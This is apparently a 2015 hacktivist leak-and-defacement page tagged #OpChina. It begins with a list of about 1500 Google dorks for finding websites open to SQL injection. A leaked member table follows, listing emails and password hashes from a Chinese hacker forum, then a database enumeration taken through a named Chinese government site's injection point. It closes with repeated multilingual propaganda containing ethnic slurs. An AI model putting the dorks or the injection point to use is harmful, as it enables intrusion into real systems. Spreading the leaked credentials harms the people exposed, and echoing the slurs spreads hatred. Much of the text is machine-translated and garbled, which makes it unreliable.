 1500 Google SQL injection vulnerability injection vulnerability resources - published yesterday -1500+ google Dorks for sql injection.Definition of google dorks: Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.1500 Google SQL injection vulnerability injectionBY: Hackers unit _1337mirlist below:allinurl:.? * php txtCodiInfo =inurl: read.php =?inurl: "ViewerFrame Mode =?"inurl: index.php id =?inurl: trainers.php id =?inurl: buy.php category =?inurl: article.php ID =?inurl: play_old.php id =?inurl: declaration_more.php decl_id =?inurl: pageid =inurl: games.php id =?inurl:? page.php file =inurl: newsDetail.php id =?inurl: gallery.php id =?inurl: article.php id =?inurl: show.php id =?inurl: staff_id =inurl: newsitem.php num =?inurl: readnews.php id =?inurl:? top10.php cat =inurl: historialeer.php num =?inurl: reagir.php num =?inurl: Stray-Questions-View.php num =?inurl: forum_bds.php num =?inurl: game.php id =?inurl: view_product.php id =?inurl: newsone.php id =?inurl: sw_comment.php id =?inurl: news.php id =?inurl: avd_start.php avd =?inurl: event.php id =?inurl: product-item.php id =?inurl: sql.php id =?inurl: news_view.php id =?inurl: select_biblio.php id =?inurl: humor.php id =?inurl: aboutbook.php id =?inurlgl_inet.php? ogl_id =inurl: fiche_spectacle.php id =?inurl: communique_detail.php id =?inurl: sem.php3 id =?inurl: kategorie.php4 id =?inurl: news.php id =?inurl: index.php id =?inurl: faq2.php id =?inurl: show_an.php id =?inurl: preview.php id =?inurl: loadpsb.php id =?inurlpinions.php? id =inurl: spr.php id =?inurl: pages.php id =?inurl: announce.php id =?inurl: clanek.php4 id =?inurl: participant.php id =?inurl: download.php id =?inurl: main.php id =?inurl: review.php id =?inurl: chappies.php id =?inurl: prod_detail.php id =?inurl: viewphoto.php id =?inurl: article.php id =?inurl: person.php id =?inurl: productinfo.php id =?inurl: showimg.php id =?inurl: view.php id =?inurl: website.php id =?inurl: hosting_info.php id =?inurl: gallery.php id =?inurl: rub.php idr =?inurl: view_faq.php id =?inurl: artikelinfo.php id =?inurl: detail.php ID =?inurl: index.php =?inurl: profile_view.php id =?inurl: category.php id =?inurl: publications.php id =?inurl: fellows.php id =?inurl: downloads_info.php id =?inurl: prod_info.php id =?inurl: shop.php do = part & id =?inurl: productinfo.php id =?inurl: collectionitem.php id =?inurl: band_info.php id =?inurl: product.php id =?inurl: releases.php id =?inurl: ray.php id =?inurl: produit.php id =?inurl: pop.php id =?inurl: shopping.php id =?inurl: productdetail.php id =?inurl: post.php id =?inurl: viewshowdetail.php id =?inurl: clubpage.php id =?inurl: memberInfo.php id =?inurl: section.php id =?inurl: theme.php id =?inurl: page.php id =?inurl: shredder-categories.php id =?inurl: tradeCategory.php id =?inurl: product_ranges_view.php ID =?inurl: shop_category.php id =?inurl: transcript.php id =?inurl: channel_id =inurl: item_id =inurl: newsid =inurl: trainers.php id =?inurl: news-full.php id =?inurl: news_display.php getid =?inurl: index2.php option =?inurl: readnews.php id =?inurl:? top10.php cat =inurl: newsone.php id =?inurl: event.php id =?inurl: product-item.php id =?inurl: sql.php id =?inurl: aboutbook.php id =?inurl: preview.php id =?inurl: loadpsb.php id =?inurl: pages.php id =?inurl: material.php id =?inurl: clanek.php4 id =?inurl: announce.php id =?inurl: chappies.php id =?inurl: read.php id =?inurl: viewapp.php id =?inurl: viewphoto.php id =?inurl: rub.php idr =?inurl:? galeri_info.php l =inurl: review.php id =?inurl: iniziativa.php in =?inurl: curriculum.php id =?inurl: labels.php id =?inurl: story.php id =?inurl: look.php ID =?inurl: newsone.php id =?inurl: aboutbook.php id =?inurl: material.php id =?inurlpinions.php? id =inurl: announce.php id =?inurl: rub.php idr =?inurl:? galeri_info.php l =inurl: tekst.php idt =?inurl: newscat.php id =?inurl: newsticker_info.php idn =?inurl: rubrika.php idr =?inurl: rubp.php idr =?inurlffer.php? idf =inurl: art.php idm =?inurl: title.php id =?intitle: axis intitle: "video server"inurl: indexFrame.shtml Axis? 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 1500條谷歌SQL注入漏洞注射漏洞資源-發表於前天-1500+ google Dorks for sql injection.Definition of google dorks: Advanced Google searches used to find security loopholes on websites and allow hackers to break in to or disrupt the site.1500條谷歌SQL注入漏洞注射BY:黑客部_1337mirlist below:allinurl:*.php?txtCodiInfo=inurl:read.php?=inurl:”ViewerFrame?Mode=”inurl:index.php?id=inurl:trainers.php?id=inurl:buy.php?category=inurl:article.php?ID=inurl:play_old.php?id=inurl:declaration_more.php?decl_id=inurl:pageid=inurl:games.php?id=inurl:page.php?file=inurl:newsDetail.php?id=inurl:gallery.php?id=inurl:article.php?id=inurl:show.php?id=inurl:staff_id=inurl:newsitem.php?num=inurl:readnews.php?id=inurl:top10.php?cat=inurl:historialeer.php?num=inurl:reagir.php?num=inurl:Stray-Questions-View.php?num=inurl:forum_bds.php?num=inurl:game.php?id=inurl:view_product.php?id=inurl:newsone.php?id=inurl:sw_comment.php?id=inurl:news.php?id=inurl:avd_start.php?avd=inurl:event.php?id=inurl:product-item.php?id=inurl:sql.php?id=inurl:news_view.php?id=inurl:select_biblio.php?id=inurl:humor.php?id=inurl:aboutbook.php?id=inurlgl_inet.php?ogl_id=inurl:fiche_spectacle.php?id=inurl:communique_detail.php?id=inurl:sem.php3?id=inurl:kategorie.php4?id=inurl:news.php?id=inurl:index.php?id=inurl:faq2.php?id=inurl:show_an.php?id=inurl:preview.php?id=inurl:loadpsb.php?id=inurlpinions.php?id=inurl:spr.php?id=inurl:pages.php?id=inurl:announce.php?id=inurl:clanek.php4?id=inurl:participant.php?id=inurl:download.php?id=inurl:main.php?id=inurl:review.php?id=inurl:chappies.php?id=inurl:prod_detail.php?id=inurl:viewphoto.php?id=inurl:article.php?id=inurl:person.php?id=inurl:productinfo.php?id=inurl:showimg.php?id=inurl:view.php?id=inurl:website.php?id=inurl:hosting_info.php?id=inurl:gallery.php?id=inurl:rub.php?idr=inurl:view_faq.php?id=inurl:artikelinfo.php?id=inurl:detail.php?ID=inurl:index.php?=inurl:profile_view.php?id=inurl:category.php?id=inurl:publications.php?id=inurl:fellows.php?id=inurl:downloads_info.php?id=inurl:prod_info.php?id=inurl:shop.php?do=part&id=inurl:productinfo.php?id=inurl:collectionitem.php?id=inurl:band_info.php?id=inurl:product.php?id=inurl:releases.php?id=inurl:ray.php?id=inurl:produit.php?id=inurl:pop.php?id=inurl:shopping.php?id=inurl:productdetail.php?id=inurl:post.php?id=inurl:viewshowdetail.php?id=inurl:clubpage.php?id=inurl:memberInfo.php?id=inurl:section.php?id=inurl:theme.php?id=inurl:page.php?id=inurl:shredder-categories.php?id=inurl:tradeCategory.php?id=inurl:product_ranges_view.php?ID=inurl:shop_category.php?id=inurl:transcript.php?id=inurl:channel_id=inurl:item_id=inurl:newsid=inurl:trainers.php?id=inurl:news-full.php?id=inurl:news_display.php?getid=inurl:index2.php?option=inurl:readnews.php?id=inurl:top10.php?cat=inurl:newsone.php?id=inurl:event.php?id=inurl:product-item.php?id=inurl:sql.php?id=inurl:aboutbook.php?id=inurl:preview.php?id=inurl:loadpsb.php?id=inurl:pages.php?id=inurl:material.php?id=inurl:clanek.php4?id=inurl:announce.php?id=inurl:chappies.php?id=inurl:read.php?id=inurl:viewapp.php?id=inurl:viewphoto.php?id=inurl:rub.php?idr=inurl:galeri_info.php?l=inurl:review.php?id=inurl:iniziativa.php?in=inurl:curriculum.php?id=inurl:labels.php?id=inurl:story.php?id=inurl:look.php?ID=inurl:newsone.php?id=inurl:aboutbook.php?id=inurl:material.php?id=inurlpinions.php?id=inurl:announce.php?id=inurl:rub.php?idr=inurl:galeri_info.php?l=inurl:tekst.php?idt=inurl:newscat.php?id=inurl:newsticker_info.php?idn=inurl:rubrika.php?idr=inurl:rubp.php?idr=inurlffer.php?idf=inurl:art.php?idm=inurl:title.php?id=intitle:axis intitle:”video server”inurl:indexFrame.shtml Axis?intitle:index.of? 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 Chinese Emperor hackers database informationPosted 7 days agomember ('1', 'v@5nb.us',' Emperor ',' b056d4e28a04fd33032336583b881bcc ', 1', '1', '01344336764', '4908', '0', '' '1', '0' , '1');member ('2', '824546717@qq.com', 'w824546717', '6ebe409cb5bec5788716e1f926300ee5' 01344345979 ',' 13 ',' 0 ',' 9999 ',' 0 ',' 1 '' 0 ');member ('3', '529590906@qq.com', 'happy', 'a70dc175907deebf55923ae514628a6d' 01344345986 ',' 2 ',' 0 ',' 9999 ',' 0 ',' 1 '' 0 ');member ('4', 'lyanshuo@163.com', 'Alien', '63e3163abaf4d8f6901c63d59d658aee' 01344345996 ',' 13 ',' 0 ',' 9999 ',' 0 ',' 1 '' 0 ');member ('5', '954709728@qq.com', 'expedition battle wearing shining armor', 'ee5f57221258558a3d326c58c3e86f4b' 01344346005 ',' 2 ',' 0 ',' 9999 '0');member ('6', 'h2cker@qq.com', 'scholar', '4ab7c83d170eb7e51330caea4bfe4baa' 01344346096 ',' 17 ',' 0 ',' 9999 '0');member ('7', '792148317@qq.com', 'ghost Lang', '996ba20a2108e2ccfe6178746a26fca5' 01344346195 ',' 2 ',' 0 ',' 9999 '0');member ('8', '165805898@qq.com', 'XS lack of good customer service', 'a228184dbb31385df1ca05054ff9d889', 1 ', 11', '01344346705', '142', '0', '9999' 1 ');member ('9', 'herveylee@msn.cn', 'blackwing', 'd5bdb10b138456569835fc2bffc68114', 1 ', 13', '01344346721', '963', '0', '9999' 0 ');member ('cqnu0001@163.com', 'cqnu0001', 'fca9ce162d2aa0907be0db5f549998b2' 01344347234 ',' 4 ',' 0 ',' 9999 ',' 0 ',' 1 '' 0 ');member ('11', '545932189@qq.com', 'dk747', 'b4dc92eb96149d1d3d61f766a82810aa' 01344347298 ',' 2 ',' 0 ',' 9999 ',' 0 ',' 1 '' 0 ');member ('12', '326053465@qq.com', 'oday', 'd4a8c9032b4213034f32ea9a875ab56d' 11 ',' 01344347419 ',' 76 ',' 0 ',' 9999 '0');member ('13', '376617048@qq.com', 'Walt', '75e245d11c023cb1ad5aecce68faabab', 1 ', 01344348100', '17', '0', '9999' 1 ');member ('14', '1287154082@qq.com', 'caoshabi', 'c110b62b6ece47f5a6d21aed7cf14984', 1 ', 11', '01344348449', '69', '0', '9999' 1 ');member ('15', '656566740@qq.com', 'sumo', '3f014a2cc4dd6163f047e9fb135c9c30' 01344348840 ',' 2 ',' 0 ',' 9999 ',' 0 ',' 1 '' 0 ');member ('16', 'blackwing@5nb.us',' black wings', 'a9f17fd5bd00e1ba426d25d8227d5971' 01344349401 ',' 2 ',' 0 ',' 9999 ',' 0 ',' 1 '' 0 ');member ('17', 'asd1994324@qq.com', 'asd1994324', '56c3c10db64a424b5c9dbc59b585407d', 1 ', 01344354539', '27', '0', '9999', '0', '1' '1' );member ('18', '1873028333@qq.com', 'rookie Kohane', 'f9100364740e635108eab1e002421e41' 11 ',' 01344359638 ',' 97 ',' 0 ',' 9999 '0');member ('19', '1185708778@qq.com', 'empty city _', 'c1a9a869a487c648d66f13319038c428' '0', '3', '3', '01344368626', '164', '0', '9999', '0', '1' '1');member ('20', '740083000@qq.com', 'hack ho', 'a98041d3d9a87c34c2670ea6a047e009', 1 ', 11', '01344377121', '103', '0', '9999', '0', ' 2 '' 0 ');member ('21', '858181616@qq.com', 'Hsuan', '055eb27a887c44f9a2c1b1c5055e4e01', 1 ',' 0 ',' 3 ',' 3 ',' 0 ',' 3 ',' 1344391132 ', '1056', '0', '9999' 1 ');member ('22', '284289113@qq.com', 'indifferent smile', '084b5825dd131a5365a1b519c20519c5', 1 ', 01344398751', '0', '9999' 1 ');member ('23', 't@5nb.us',' SoHo c ',' 45f61695b475297c84d809b6a53bf1ad ', 1', '0', '2', '2', '0', '2', '1344402563' , '2241', '0', '9999' 0 ');member ('24', 'dai2977@163.com', 'GQ.L', 'dff7725b25efb48e0737f66090c4af28', 1 ',' 0 ',' 3 ',' 16 ',' 0 ',' 16 ',' 1344404130 ' , '274', '0', '9999' 1 ');member ('25', '847583453@qq.com', 'off the soul', '7e69b90fbaf093aded64f46918e9f441' 01344407508 ',' 37 ',' 0 ',' 9999 '0');member ('26', '888@888.com', 'adnim', '5ceb1527b25275764e3272cf4cc61296', 1 ', 8', '01344409924', '40', '0', '9999', '0', '1 '' 0 ');member ('27', 'ximie.3322.org@qq.com', 'alt', '9f269fcded6f7acc9e9f840867ef0575', '0', '1' '01344410035', '43', '0', '9999', ' 0 ',' 1 '' 0 ');member ('28', '328327192@qq.com', '328327192', '7212275b2408612c90c692323d8e1300', '0', '1' '01344413195', '6', '0', '9999' 0 ');member ('29', 'jzx@5nb.us', 'orange Vietnamese neighboring countries', 'e67daa47dd716c510ca7fc994d84e8f5', '1', 11 ',' 01344416164 ',' 182 ',' 0 ',' 9999 '1') ;member ('30', '1352202666@qq.com', 'gay champion -XJ', 'c0d2b83f36f10e218f654f08ee91b80f', 1 ',' 0 ',' 3 ',' 3 ',' 01344419422 ',' 238 ',' 0 ',' 9999 ',' 0 ',' 3 '' 1 ');member ('31', 'longqiwangluo@163.com', 'absolutely quiet little dragon', 'e3905f6597c2bacd36ea62bfd308d888', '0', '1' '01344422287', '11', '0', '9999' 0 ') ;member ('32', 'prclicks@gmail.com', 'susurr', '294c1706c07eaf42ced8456336ecbe85', '0', '1' '01344436762', '5', '0', '9999' 0 ');member ('33', 'www.1196371677@qq.com', 'QQ1196371677', '4d7f079d1921fb7f5cdc6779f51e719d' 8 ',' 01344487690 ',' 2 ',' 0 ',' 9999 '0');member ('34', '422467735@qq.com', 'a422467735', '61df82619e4b7eb20378d53030b61a1f' 8 ',' 01344506655 ',' 4 ',' 0 ',' 9999 '0');member ('35', '2468987991@qq.com', 'Learner', 'f9151450fd71df2f063dc1853acdfc84', '1', '0', '3', '3', '0', '3', '1344515704', '77', '0', '9999', '0', '2' '1');member ('36', '530044042@qq.com', 'admin', 'bb7449a13a6bf43f837a09696da91053', '0', '1' '01344518228', '20', '0', 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'1' );member ('68', '1076710249@qq.com', 'anonymity °', 'd5ff4c4a3c587ba1e784a5f1058a46b5', 1 ', 01344811064', '40', '0', '9999', '0', '1' '1 ');member ('69', '807170509@qq.com', 'Roy_ ambiguous', '9257b59956de56c068e60d2841c49bed', 1 ', 11', '01344814256', '62', '0', '9999', '0', '1' '1');member ('70', '704520785@qq.com', 'alex', '7ebf801707eb03b6125a7882f58ba72a', '0', '1' '01344819816', '6', '0', '9999', '0', ' 1 '0');member ('71', '5989998@qq.com', 'wolf', '3d8fb00f01a1844e13ca4d4158bab65c', '0', '1' '01344824309', '11', '0', '9999' 0 ');member ('72', '1349559052@qq.com', 'qq55135', 'c0670fc8a86c87460111fc2a4381e06d', '0', '1' '01344848434', '12', '0', '9999' 0 ');member ('73', 'service@5igta.com', 'Pitt Poetry', '3d9510ffe093ffc8c98265a72815e78b', '1', '0', '3', '16', '0', '16', '1344858137' , '2703', '0', '9999' 1 ');member ('74', '2316466877@qq.com', 'simple-minded', '9c17db3db85e53a8653cf6e706f858bc', '0', '1' '11', '01344867561', '87', '0', '9999' 1 ');member ('75', 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' 0 ',' 1 '' 0 ');member ('2582883064@qq.com', 'a8641003', '68e213ce9fb4ecdc582ec63a31be8ce6', '0', '1' '01346825345', '39', '0', '9999', '0', '1' '0 ');member ('211', 'slwolf@qq.com', 'slwolf', '842730b17b7a2b58090a3e290de8280c', '0', '1' '01346828011', '39', '0', '9999', '0', ' 1 '0');member ('212', '405475164@qq.com', 'kuyitianxia', '7ccd7752ace525267ee775912b365fe5', '0', '1' '01346832902', '39', '0', '9999' 0 ');member ('213', '1206679193@qq.com', 'memory', '027d73c0880f600021f92376840565ce', '0', '1' '01346903547', '44', '0', '9999', '0', ' 1 '0');member ('214', '953432241@qq.com', 'qq953432241', '45ccfdf86e57c3b59daffdf38ef07fac', '0', '1' '11', '01346904991', '108', '0', '9999' 0 ' );member ('215', '2264015352@qq.com', 'DelpiD', '26e6928438857c6bdbca73eb4254038b', '0', '1' '01346915735', '42', '0', '9999' 0 ');member ('216', '40121120@qq.com', '40121120', '3983287dede0a42c3fe9d046a60c07e9', '0', '1' '11', '01346922695', '60', '0', '9999', ' 0 ',' 2 '' 0 ');member ('217', 'binmissu@vip.qq.com', 'Calvary', '9613a8d782e4141638a8b957845f515e', '0', '1' '01346939836', '40', '0', '9999', '0 '' 1 '' 0 ');member ('218', 'windoos@126.com', 'Eater', '3d9377855c3d218ecd64e18148293147', 1 ', 01346961638', '14', '0', '9999' 1 ');member ('219', '1131581869@qq.com', '1131581869', '4f6b026124a123c75694acfbecec3056', '0', '1' '01346998460', '43', '0', '9999', '0', ' 1 '' 1 ');member ('220', '87152534@qq.com', '3154058', '30d8af48c57834835227c84e69de5266', '0', '1' '01347004901', '41', '0', '9999' 0 ');member ('221', '1023661992@qq.com', 'a1023661992', '3c2fb220811d2c0e34ad9c7bfdcd6b2f', '0', '1' '01347013175', '39', '0', '9999' 0 ');member ('222', '365123809@qq.com', 'yh8', '9d1f341da5b6abbe1074234adf6fbc28', '0', '1' '11', '01347016015', '95', '0', '9999' 0 ' );member ('223', '1273653446@qq.com', 'false false', '5c3195909603c9292ea3fbd4e002bd31', '0', '1' '01347019838', '36', '0', '9999', '0', '1' '0');member ('224', '247396051@qq.com', 'cat seven', 'edc1d2301455b1fbd53a45ad1a28c6e9', '0', '1' '11', '01347028949', '132', '0', '9999' 0 ');member ('225', 'my.hacker.xy@qq.com', 'HacKer, solo', '10f49e3c4a2ef5570f172824138ce553', '1', 11 ',' 01347029820 ',' 55 ',' 0 ',' 9999 ' , '0', '2' '1');member ('226', '492667636@qq.com', 'yinghuangvip', '0d278cac43a7df333a5b6b4efb5ba8ff', '0', '1' '11', '01347036806', '120', '0', '9999', ' 0 ',' 2 '' 0 ');member ('227', '5403293@qq.com', '5403293', '1a4d3d7bebf6946810d3e4392947130b', '0', '1' '01347056868', '42', '0', '9999', '0', ' 1 '' 1 ');member ('228', '404516287@qq.com', 'hnxz40', '4742277d1b0428212a4e15db209c68de', '0', '1' '11', '01347074040', '55', '0', '9999', ' 0 ',' 2 '' 0 ');member ('229', '9549780@qq.com', 'xuese', 'f402851e87c01e04eccc47639de59684', '0', '1' '11', '01347078361', '58', '0', '9999' 1 ' );member ('230', '123456@qq.com', 'jiea13', '4cf1fd7f0aca2a8557eb85c54eedbb63', 1 ', 01347086911', '0', '9999' 1 '); 

 Susong County Real Estate Board # burst housing data injection vulnerability {}Posted 7 days ago.[Size = 11.818181991577148px] Vulnerability details:

[Size = 11.818181991577148px][Size = 11.818181991577148px] originated in foreign countries as shown in the statistics that the international black color and in the invasion of the Chinese government, then we will alert the administrator and told his website loopholes[Size = 11.818181991577148px] injection point: http: //www.ssfdc.gov.cn/list.php ncg_id = 169?[Size = 11.818181991577148px] looked at the website features the server should have a large number of civil servants mailbox and password information #[Size = 11.818181991577148px] depth is not enough to know there are loopholes on the line.[Size = 11.818181991577148px] database:Database: ssfdc[22 tables]+ --------------------------------------- +| Bgxz || Counter || Downloads || Fwxx || Groepen || Jzxx || Liuyan || Medewerkers || Menuautorisatie || Menuitems || News || News_category || News_pic || Qyxx || Static_page || Users || Wytg || Xmxx || Xmxx_fw || Xmxx_lp || Yqlj || Zqyjb |+ --------------------------------------- +Database: torintools[21 tables]+ --------------------------------------- +| Adds_dynamic || Addtional_images || Category || Database_scripts || Groepen || Instellingen || Medewerkers || Menuautorisatie || Menuitems || Menuvolgorde || Order_product || Orders || Product_ips || Products || Site_menu || Static_page || Subscribe || Suppliers || Tlw_words || Users || Versie |+ --------------------------------------- +Database: lygcw[39 tables]+ --------------------------------------- +| Auto_brand || Auto_logo || Auto_parameter || Auto_producer || Auto_salecompany || Auto_salecompany_brand || Auto_styles || Banners || Banners_clicks || Banners_group || Banners_info || Banners_logs || Banners_position || Category || Category_count || Company_logs || Groups || Img_category || Img_girls || Img_incategory || Img_info || Img_logs || Img_sites || Info_salecompany || Information || Information_focus || Links || Menuauthorization || Menuitems || Oils || Sales_order || Sales_quotations || Sales_quotations_remarks || Sales_quotations_style || Tuan || Tuan_jiang || Tuan_shares || Tuan_users || Users |+ --------------------------------------- +Database: xhslg[9 tables]+ --------------------------------------- +| Category || Groups || Information || Information_focus || Links || Menuauthorization || Menuitems || People || Users |+ --------------------------------------- +Database: lygcw_tuan[1 table]+ --------------------------------------- +| Tuan_clicks_1 |+ --------------------------------------- +Database: p2pdb[77 tables]+ --------------------------------------- +| Ry_admin || Ry_adv || Ry_api_login || Ry_article || Ry_article_cate || Ry_auto_cache || Ry_bank || Ry_conf || Ry_deal || Ry_deal_agency || Ry_deal_cate || Ry_deal_collect || Ry_deal_inrepay_repay || Ry_deal_load || Ry_deal_load_repay || Ry_deal_loan_type || Ry_deal_msg_list || Ry_deal_order || Ry_deal_order_item || Ry_deal_order_log || Ry_deal_payment || Ry_deal_repay || Ry_delivery_region || Ry_expression || Ry_link || Ry_link_group || Ry_log || Ry_mail_list || Ry_mail_server || Ry_medal || Ry_message || Ry_message_type || Ry_mobile_list || Ry_msg_box || Ry_msg_conf || Ry_msg_system || Ry_msg_template || Ry_nav || Ry_payment || Ry_payment_notice || Ry_point_group || Ry_point_group_link || Ry_referrals || Ry_region_conf || Ry_remind_count || Ry_reportguy || Ry_role || Ry_role_access || Ry_role_group || Ry_role_module || Ry_role_nav || Ry_role_node || Ry_sms || Ry_topic || Ry_urls || Ry_user || Ry_user_active_log || Ry_user_auth || Ry_user_autobid || Ry_user_carry || Ry_user_contacter || Ry_user_credit_file || Ry_user_extend || Ry_user_field || Ry_user_focus || Ry_user_frequented || Ry_user_group || Ry_user_level || Ry_user_log || Ry_user_medal || Ry_user_sign_log || Ry_user_sta || Ry_user_work || Ry_user_x_y_point || Ry_vote || Ry_vote_ask || Ry_vote_result |+ --------------------------------------- +Database: mysql[24 tables]+ --------------------------------------- +| Temp_udf || Columns_priv || Db || Event || Func || General_log || Help_category || Help_keyword || Help_relation || Help_topic || Host || Ndb_binlog_index || Plugin || Proc || Procs_priv || Servers || Slow_log || Tables_priv || Time_zone || Time_zone_leap_second || Time_zone_name || Time_zone_transition || Time_zone_transition_type || User |+ --------------------------------------- +Database: txinxian[11 tables]+ --------------------------------------- +| Category || Customers || Groups || Manage_acounts || Manage_staffs || Menuauthorization || Menuitems || Messages || Orders || Products || Users |+ --------------------------------------- +Database: information_schema[28 tables]+ --------------------------------------- +| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_APPLICABILITY || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || KEY_COLUMN_USAGE || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+ --------------------------------------- + [Size = 11.818181991577148px] hacker portion www .cnhackmy.com www.hack-gov.cn [size = 11.818181991577148px]

 !! rubbish Chinaman programming ..hahaha...craxy ...silly...outday...evil #OpChina !!


 *-Update[30/6/2015]-By our huge Anonymous #TangoDown by ''p@r@dox17'' .. #Palestine_DZ  #AnonGhost  #OpChina)-Our Hero fighting to Human Right and
sharing the Chinese hackers portion lost China face! A variety of Chinese hacker rubbish programming ..you want to see the scandal open to the public ah...haha^^)-
-更新[30/6/2015] - 通過我們的龐大的匿名#TangoDown由''P@R@ dox17''..
#Palestine_DZ#AnonGhost#OpChina) - 我們的英雄戰鬥人權和
-Update [30/6/2015] -Mit unserer riesigen Anonymous #TangoDown durch '' p@r@dox17 ''..#Palestine_DZ  #AnonGhost  #OpChina) -Unsere Helden kämpfen, um Menschenrecht und die gemeinsame Nutzung der chinesische Hacker Teil verloren China Gesicht! Eine Vielzahl von chinesischen Hacker Müll programming..you möchte den Skandal die Öffentlichkeit zugänglich ah sehen...haha ^^)-
-Update[30/6/2015] ''のp@Rの@のdox17''#Palestine_DZ #AnonGhost #OpChinaを)」-により、当社の巨大匿名#TangoDownを-by人権に戦っ-Ourヒーローと]中国のハッカー部分を共有することは中国の顔を失いました!中国のハッカーごみprogramming..youの様々な)^^ハハ...ああ公共に開放スキャンダルを見たいと思っています -
-Mise À jour [30/6/2015] -Par notre immense Anonyme #TangoDown par
'' p@r@dox17 ''..#Palestine_DZ  #AnonGhost  #OpChina) -Notre héros luttant pour droit de l'homme et partager la partie de pirates chinois a perdu la Chine visage! Une variété de pirate chinois ordures programming..you veulent voir le scandale ouvert au public ah...haha ​​^^) -
-Update [30/6/2015] '피의@r에@를dox17'..#Palestine_DZ  #AnonGhost #OpChina을) '에 의해 우리의 거대한 익명 #TangoDown을에 의하여 - 인권에 싸움 - 우리 영웅과-중국 해커 부분을 공유하는 것은 중국에게 얼굴을 잃었다! 중국어 해커 쓰레기 programming..you의 다양한) ^^ 하하 ... 대중 아에게 공개 스캔들을보고 싶어-**All The World Lauguage**-





by p@r@dox17 --------------------------------



by p@r@dox17

by p@r@dox17

by p@r@dox17

by p@r@dox17 ---------------------- 

by p@r@dox17

  13小時13 小時前
by p@r@dox17 --------------------------------

by p@r@dox17

just test hihihihi

by p@r@dox17



@ZsgsDesign 6月24日 


 *Please Sharing...

*My friendly Anonymous ~
「心形」的圖片搜尋結果 张佑杰




 ---[24/06/2015]-Look at our great hero Anonymous "@DZ_paradox17 revenge demons Communist mainland Chinaman's denial of human rights the seven million people of Hong Kong and the mainland  peoples! demons Communist mainland Chinaman suffered to punish !! Anonymous will not forget! Anonymous will not forgive! We are Anonymous!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- ---[24/06/2015]-看我們偉大的英雄匿名@DZ_paradox17的報復大陸妖魔共產黨支那人的剝奪香港7000000人口和大陸人民的 人權,所受的懲罰!!匿名不會忘記!匿名不會原諒!我們是匿名!!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld) - ---[24/06/2015]-Schauen Sie sich unsere großen Helden Anonym "@DZ_paradox17 Rache Dämonen kommunistischen Festland Chinesen Verweigerung der Menschenrechte die sieben Millionen Menschen in Hongkong und dem Festland Völker! Dämonen kommunistischen Festland Chinesen erlitten zu bestrafen !! Anonymous werden nicht vergessen! Anonymous wird nicht vergeben! Wir sind Anonym!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- ---[24/06/2015]-我々の偉大な英雄匿名"@DZ_paradox17の復讐の鬼を見共産本土人権の中国人の否定香港七万人と本土の人々! 悪魔は共産本土中国人は処罰する苦しん!匿名は忘れません!匿名は許さありません!私たちは、匿名であります! -(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- For My All Huge Anonymous -by the Apple daily reported "CPPCC Ambrose name Kwun Tong industrial building in the whole block illegal Room!!"-& " Ping Theory: people vote for the Pan sword and shoe and, vote for establishment and other buried Uncle Fat!!{ Famous eidtor:Li Yi,Mr.}-**All The World Lauguage**-

by p@r@dox17 ---------------------------

by p@r@dox17

by p@r@dox17

  19小時19 小時前
by p@r@dox17

by p@r@dox17  

by p@r@dox17



New Deface Page to Upload <- Expect more for 2months or maybe 1 depending how much, Busy of doing other projects

anti star des sectes illuminati ,fran-maçon,scientologie etc...


 *---[20/06/2015]-Look at our great hero Anonymous "@DZ_paradox17 revenge demons Communist mainland Chinaman's denial of human rights the seven million people of Hong Kong and the mainland  peoples! demons Communist mainland Chinaman suffered to punish !! Anonymous will not forget! Anonymous will not forgive! We are Anonymous!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
---[20/06/2015]-看我們偉大的英雄匿名@DZ_paradox17的報復大陸妖魔共產黨支那人的剝奪香港7000000人口和大陸人民的人權,所受的懲罰!!匿名不會忘記!匿名不會原諒!我們是匿名!!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld) -
---[20/06/2015]-Schauen Sie sich unsere großen Helden Anonym "@DZ_paradox17 Rache Dämonen kommunistischen Festland Chinesen Verweigerung der Menschenrechte die sieben Millionen Menschen in Hongkong und dem Festland Völker! Dämonen kommunistischen Festland Chinesen erlitten zu bestrafen !! Anonymous werden nicht vergessen! Anonymous wird nicht vergeben! Wir sind Anonym!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
---[20/06/2015]-我々の偉大な英雄匿名"@DZ_paradox17の復讐の鬼を見共産本土人権の中国人の否定香港七万人と本土の人々!悪魔は共産本土中国人は処罰する苦しん!匿名は忘れません!匿名は許さありません!私たちは、匿名であります! -(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)- 
---[20/06/2015]-Oeil à notre grand héros démons Anonyme "@DZ_paradox17 de vengeance continentale communiste le refus de Chinois des droits de l'homme des sept millions d'habitants de Hong Kong et les peuples du continent! démons Chinois de la partie continentale communiste souffert de punir !! Anonyme va pas oublier! Anonyme ne pardonnera pas! Nous sommes Anonymes!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
---[20/06/2015]-Katso meidän suuri sankari Anonyymi "@DZ_paradox17 kosto demonit kommunistisen Manner Chinaman n ihmisoikeuksien kieltäminen seitsemän miljoonaa ihmistä Hongkongin ja Manner kansat! Demonit kommunistisen Manner Chinaman kärsinyt rangaista !! Anonymous ei unohda! Anonymous eivät anteeksi! Olemme Anonymous!-(OpChina #OpHK #OpISIS #Op_Tible #OpRussian #OpSeaWorld)-
